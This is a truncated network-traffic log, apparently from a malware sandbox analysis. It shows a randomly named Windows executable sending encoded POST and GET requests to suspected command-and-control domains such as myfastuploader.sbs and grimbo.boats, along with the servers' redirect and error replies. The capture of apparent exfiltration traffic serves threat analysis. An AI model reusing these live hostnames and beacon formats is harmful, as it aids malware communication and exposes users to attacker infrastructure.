idTDev6P=v+I3B5no01K0jHtZnVDtE5JPmbHR9/7TRVE7tA80e8FAhYTx4x8XU9SD3mVJZFJ7qKNqx5nkX8lB6duVt5eDFfrElFUmVWd+jGrXTjqWlKhelvm4Mz0g20OzL2qzpTY5uprKclheQ5EkUUgY3EOhlfH2Wsaa+KcHyKrXSxlSSNzvpVsNBIbmzCwzEOvz2+8yhyIAWp7RdyeE4776294DmnCPypDFMlC0Ul1mldz1iHEe8/TWiv4oN2M6vVRTLP4IielbvYFAN8xQgxNatawhHhiVthhe5w61nWSF070xzYV3bOGIMWLFtTNgu4oferUm3fNT5ymPaIEJt8k5w6bsyU26076NlWcKowfdERsj4pemWuKlxtBMCmeSDiQ1Xn2JSfElx5KJCEf2Xx4uvtAhybcHBOKiLD9P5bgsiPu9HYor/pTb03H/aAEZ8nGLasXhPMtK6VEVpt0utx0zo+wg9UrFl5RqyqnDYo1Vow+gAc9cQUygpkQGu4+QDJFBAAfSfV5n5YNGblthpYLBRVETB30AVN/bq7DsnBMpCLUJWWJJGOI+9wwEQqxRqfyGe/N/UIJDysdFX4yRR8ee+guGN0gm/VredqdaHFptDMt4pDXH3ZjEbsY2iXTg5rVfiaoK/0JYC14EpSFrHTdWLEDSugLOtrN9WJmkX/FyzlIXcVn+2DJrPGSmhqvaYJ/ns3peGBU3SxzJW5TVccO3WVBt6WiUCCwpaZnIgl10TzhhBDbpHwP01Eax9C9Ag63j9Yfq+bjWvzZyuGU6ocG9yUc25pxgB5psBprJUFEXUsztpHR7TToweK3ssIhn1a1+WETAAQmuCfZoK6DgzKNDYNLMHNoFE4aj1rX4YVsOLXU2ZLFNYFVL83/WJ8iwi/3tg01pvZ6NqAqA9wuJtnjduvL6J69RbkLm8A+HNadr4gQElxzI7NotDhcBTDRCKH2ga5h/UDy0pywHPX9SKQVbYqqo55X2aBqwz0dabAfReMbHD9e [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49916	15.197.240.20	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:20:16.148545027 CET	470	OUT	GET /u8xw/?z2=LHT8eHbp3J&idTDev6P=i8gXCJLEz0m1jkVC3VXAcNUKqrLt4taQegcb3nUsXOZ4n5/i1i4bc9in+BhRQDpL1rpCirHyU+hVzoSxv42EL87/iV5cEHcZkG+VUFy3lql/kPGuEhgf21E= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.esscosaathi.info Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Jan 13, 2025 10:20:17.600891113 CET	379	IN	HTTP/1.1 200 OK content-type: text/html date: Mon, 13 Jan 2025 09:20:17 GMT content-length: 258 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 7a 32 3d 4c 48 54 38 65 48 62 70 33 4a 26 69 64 54 44 65 76 36 50 3d 69 38 67 58 43 4a 4c 45 7a 30 6d 31 6a 6b 56 43 33 56 58 41 63 4e 55 4b 71 72 4c 74 34 74 61 51 65 67 63 62 33 6e 55 73 58 4f 5a 34 6e 35 2f 69 31 69 34 62 63 39 69 6e 2b 42 68 52 51 44 70 4c 31 72 70 43 69 72 48 79 55 2b 68 56 7a 6f 53 78 76 34 32 45 4c 38 37 2f 69 56 35 63 45 48 63 5a 6b 47 2b 56 55 46 79 33 6c 71 6c 2f 6b 50 47 75 45 68 67 66 32 31 45 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?z2=LHT8eHbp3J&idTDev6P=i8gXCJLEz0m1jkVC3VXAcNUKqrLt4taQegcb3nUsXOZ4n5/i1i4bc9in+BhRQDpL1rpCirHyU+hVzoSxv42EL87/iV5cEHcZkG+VUFy3lql/kPGuEhgf21E="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49957	136.243.225.5	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:20:22.697398901 CET	750	OUT	POST /y3ui/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.myfastuploader.sbs Origin: http://www.myfastuploader.sbs Referer: http://www.myfastuploader.sbs/y3ui/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 4f 36 54 6c 2b 78 6d 58 52 37 6a 55 78 55 61 50 50 48 57 49 36 32 35 78 51 61 56 53 6c 30 6b 6a 45 43 6b 78 43 6b 73 47 4f 32 50 6d 52 69 4b 44 47 75 54 2f 64 44 74 78 49 4b 2f 55 75 45 67 47 42 33 48 73 50 5a 6c 56 47 6d 77 37 44 79 4c 6b 71 56 31 6c 73 56 75 51 41 54 6f 72 34 6e 57 6c 55 43 53 7a 41 4f 53 59 5a 67 68 35 61 44 4f 31 53 35 75 55 4a 53 67 68 65 39 53 77 6d 5a 70 77 36 33 42 61 4b 6b 4f 68 35 57 77 4e 7a 46 4d 76 6f 71 56 4f 37 62 78 4d 2b 47 35 35 68 35 45 6f 43 32 30 65 74 59 71 38 6f 73 56 76 68 6d 41 4c 66 6a 4c 48 6b 6c 62 6d 55 30 34 6f 47 44 69 5a 48 67 3d 3d Data Ascii: idTDev6P=O6Tl+xmXR7jUxUaPPHWI625xQaVSl0kjECkxCksGO2PmRiKDGuT/dDtxIK/UuEgGB3HsPZlVGmw7DyLkqV1lsVuQATor4nWlUCSzAOSYZgh5aDO1S5uUJSghe9SwmZpw63BaKkOh5WwNzFMvoqVO7bxM+G55h5EoC20etYq8osVvhmALfjLHklbmU04oGDiZHg==
Jan 13, 2025 10:20:23.330616951 CET	891	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Mon, 13 Jan 2025 09:20:19 GMT location: https://www.myfastuploader.sbs/y3ui/ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49977	136.243.225.5	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:20:25.251497030 CET	770	OUT	POST /y3ui/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.myfastuploader.sbs Origin: http://www.myfastuploader.sbs Referer: http://www.myfastuploader.sbs/y3ui/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 4f 36 54 6c 2b 78 6d 58 52 37 6a 55 7a 32 4f 50 44 41 4b 49 79 32 35 79 56 61 56 53 75 55 6b 76 45 43 6f 78 43 6c 35 4e 4f 6a 2f 6d 52 48 75 44 46 72 2f 2f 59 44 74 78 44 71 2f 72 67 6b 68 4b 42 33 37 4f 50 59 70 56 47 6d 6b 37 44 7a 37 6b 71 69 4a 6b 76 6c 75 53 5a 6a 6f 70 33 48 57 6c 55 43 53 7a 41 4f 47 32 5a 6a 52 35 61 79 2b 31 54 63 53 62 44 79 67 69 49 74 53 77 69 5a 70 73 36 33 42 38 4b 6d 37 47 35 55 59 4e 7a 46 38 76 6f 2f 70 50 78 62 78 4f 36 47 34 4b 68 4a 35 45 41 48 39 66 74 6f 6d 4d 67 63 64 44 67 67 4e 52 4f 53 71 51 32 6c 2f 56 4a 7a 78 63 4c 41 66 51 63 69 53 55 65 36 46 58 6d 58 34 39 42 65 53 6b 71 6e 34 56 61 64 6f 3d Data Ascii: idTDev6P=O6Tl+xmXR7jUz2OPDAKIy25yVaVSuUkvECoxCl5NOj/mRHuDFr//YDtxDq/rgkhKB37OPYpVGmk7Dz7kqiJkvluSZjop3HWlUCSzAOG2ZjR5ay+1TcSbDygiItSwiZps63B8Km7G5UYNzF8vo/pPxbxO6G4KhJ5EAH9ftomMgcdDggNROSqQ2l/VJzxcLAfQciSUe6FXmX49BeSkqn4Vado=
Jan 13, 2025 10:20:25.887921095 CET	891	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Mon, 13 Jan 2025 09:20:22 GMT location: https://www.myfastuploader.sbs/y3ui/ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49994	136.243.225.5	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:20:28.110378981 CET	10852	OUT	POST /y3ui/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.myfastuploader.sbs Origin: http://www.myfastuploader.sbs Referer: http://www.myfastuploader.sbs/y3ui/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 4f 36 54 6c 2b 78 6d 58 52 37 6a 55 7a 32 4f 50 44 41 4b 49 79 32 35 79 56 61 56 53 75 55 6b 76 45 43 6f 78 43 6c 35 4e 4f 6a 33 6d 52 56 6d 44 46 49 48 2f 66 44 74 78 4f 4b 2f 51 67 6b 67 51 42 33 54 4b 50 59 55 69 47 6b 63 37 44 56 76 6b 6a 7a 4a 6b 34 31 75 53 52 44 6f 73 34 6e 57 4b 55 43 44 36 41 4f 57 32 5a 6a 52 35 61 77 32 31 54 4a 75 62 46 79 67 68 65 39 53 38 6d 5a 70 49 36 33 6f 48 4b 6d 75 78 35 6b 34 4e 71 6c 73 76 71 4e 42 50 33 4c 78 41 32 6d 34 53 68 4a 31 62 41 44 56 70 74 72 36 31 67 65 42 44 6a 48 68 48 62 42 75 5a 70 56 54 38 51 55 42 39 4b 77 44 42 48 6a 4f 70 51 76 4d 50 78 45 67 41 5a 66 7a 33 2b 6d 73 6c 4f 64 73 33 48 46 70 4a 5a 78 59 61 43 32 50 71 30 2b 71 57 51 64 45 2b 34 43 38 67 6e 57 2b 6d 57 2f 75 4c 4d 58 71 49 44 49 78 74 35 42 53 6c 31 59 75 39 59 49 41 66 64 30 6b 30 42 44 64 59 70 41 41 63 4d 6b 51 31 74 39 50 75 39 71 65 50 47 53 58 6a 74 6e 6c 53 69 37 53 4a 33 50 6b 43 58 50 48 74 52 48 6b 37 72 39 56 4b 35 6b 70 6e 39 36 71 46 56 [TRUNCATED] Data Ascii: idTDev6P=O6Tl+xmXR7jUz2OPDAKIy25yVaVSuUkvECoxCl5NOj3mRVmDFIH/fDtxOK/QgkgQB3TKPYUiGkc7DVvkjzJk41uSRDos4nWKUCD6AOW2ZjR5aw21TJubFyghe9S8mZpI63oHKmux5k4NqlsvqNBP3LxA2m4ShJ1bADVptr61geBDjHhHbBuZpVT8QUB9KwDBHjOpQvMPxEgAZfz3+mslOds3HFpJZxYaC2Pq0+qWQdE+4C8gnW+mW/uLMXqIDIxt5BSl1Yu9YIAfd0k0BDdYpAAcMkQ1t9Pu9qePGSXjtnlSi7SJ3PkCXPHtRHk7r9VK5kpn96qFVvOl7nFJgs6rXOIp4d9mFo2JzhptT9cqnN7zVsHPeVlcwUGt7c9+S4LLkT/eiio4DL4LAo6hdwUhuSKQSEN2/tAUNklgKemGzjAMFIOH4FTEKsj/qLBnxx7oSYu4s21m3nG+EUVniZ7+6b8JD9r0PQahccixS+5Oyyo+Rs3nI8pKu0vMY01/k+bZQLOUN1dRVQREz1DaJEZjSU+k7QdtNduaNvGgFIknTowxk4ZlXpfDAO4OIBItovMDlOJeTgqtFkJgtChFWJ9D5vqyKt3sZZZUJOtHOrtfo5tI08DUiPC1YfIpSpjsQvTpdb15kESmMpmnzxDfjevHMa9FfP3mUu87ghUXsmEoaxJ8DDCZsIwTFcVObDYgQncBiojuYao4M1qoDqBymNSNDPMKptQ8FcnKYtqSRZCP2lTHMtIFR3iFUcsEsSY1BI2d28P80wMpTx8aZYqhuMpsXKPl1xY/KrGswUEUgnU7rGtboCdXh5WowNRg2UZ89zGl1XZEWsEoN5ccrDtN9lNJ+xoAMj8Zj9GLQrfLgKdlb2iBNQaqxJl7DEqlaDikgd9/LUZ7obJBV5/j2QZJZreEF1SoHpOZWxFaFu4QNRCXDz1ZJJrz6XaPe/et9o5FgUSnjroJhxYMsPvPmEQwpVLJlB+brDaQ7Ziej66kitNYPJ2 [TRUNCATED]
Jan 13, 2025 10:20:28.783087015 CET	891	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Mon, 13 Jan 2025 09:20:25 GMT location: https://www.myfastuploader.sbs/y3ui/ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	50010	136.243.225.5	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:20:30.654356956 CET	472	OUT	GET /y3ui/?idTDev6P=D47F9HanQoviz063Kla+uXJoUZ9Xkn5EFykOP0gieBCBMXnJAqL7dT9IMNT9u2QvL1nqZZA8LUwsGl6iuyQexR6UeFArqVG6bzfyBJ63IAhlWCOyYqCEOzA=&z2=LHT8eHbp3J HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.myfastuploader.sbs Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Jan 13, 2025 10:20:31.291377068 CET	1035	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Mon, 13 Jan 2025 09:20:27 GMT location: https://www.myfastuploader.sbs/y3ui/?idTDev6P=D47F9HanQoviz063Kla+uXJoUZ9Xkn5EFykOP0gieBCBMXnJAqL7dT9IMNT9u2QvL1nqZZA8LUwsGl6iuyQexR6UeFArqVG6bzfyBJ63IAhlWCOyYqCEOzA=&z2=LHT8eHbp3J Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	50017	104.21.18.171	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:20:36.354372978 CET	732	OUT	POST /mjs1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.grimbo.boats Origin: http://www.grimbo.boats Referer: http://www.grimbo.boats/mjs1/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 69 64 54 44 65 76 36 50 3d 4c 58 4a 66 69 58 6e 52 53 39 43 48 76 71 5a 69 6a 43 4d 72 77 5a 63 57 30 45 71 6b 6c 78 52 52 46 30 78 2b 4c 4e 43 4f 47 32 56 39 72 73 75 45 6c 6e 2f 50 33 51 66 6f 58 76 66 57 72 6e 65 4d 31 39 50 38 72 75 39 42 45 52 6f 32 65 36 64 58 68 49 38 71 78 56 4d 45 75 4d 39 43 36 4c 46 35 44 61 6b 34 70 63 57 37 5a 50 39 68 41 4a 77 71 44 6c 30 67 65 63 4e 76 6f 6b 63 30 43 59 6d 6c 50 4e 57 77 56 30 70 72 42 38 61 6d 59 51 36 53 6c 32 57 6c 79 4b 5a 53 72 71 67 4a 53 6f 73 43 6d 38 65 46 35 56 46 33 66 79 6c 65 4f 48 39 72 37 54 58 39 64 39 2f 30 48 49 4a 78 66 57 44 58 74 51 3d 3d Data Ascii: idTDev6P=LXJfiXnRS9CHvqZijCMrwZcW0EqklxRRF0x+LNCOG2V9rsuEln/P3QfoXvfWrneM19P8ru9BERo2e6dXhI8qxVMEuM9C6LF5Dak4pcW7ZP9hAJwqDl0gecNvokc0CYmlPNWwV0prB8amYQ6Sl2WlyKZSrqgJSosCm8eF5VF3fyleOH9r7TX9d9/0HIJxfWDXtQ==
Jan 13, 2025 10:20:36.981306076 CET	1091	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:20:36 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6qaLspminxDITApjpX%2F7FjrDf5bDfL7USOzvER0IpMma6CzvMNXwKVocNYucN8uqc4MWx6NuATd3NVUU%2BHjLdDIwX48%2BzG%2B%2Fpk5l%2B7nrDkW1YSrg2xSbzmkIgbiY%2FCWOGDxK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90144fb59f395e62-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1653&rtt_var=826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=732&delivery_rate=0&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6\| )(A`cTO>9CM;<qfI~zz*Al$\^U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	50018	104.21.18.171	80	2784	C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe

Timestamp	Bytes transferred	Direction	Data
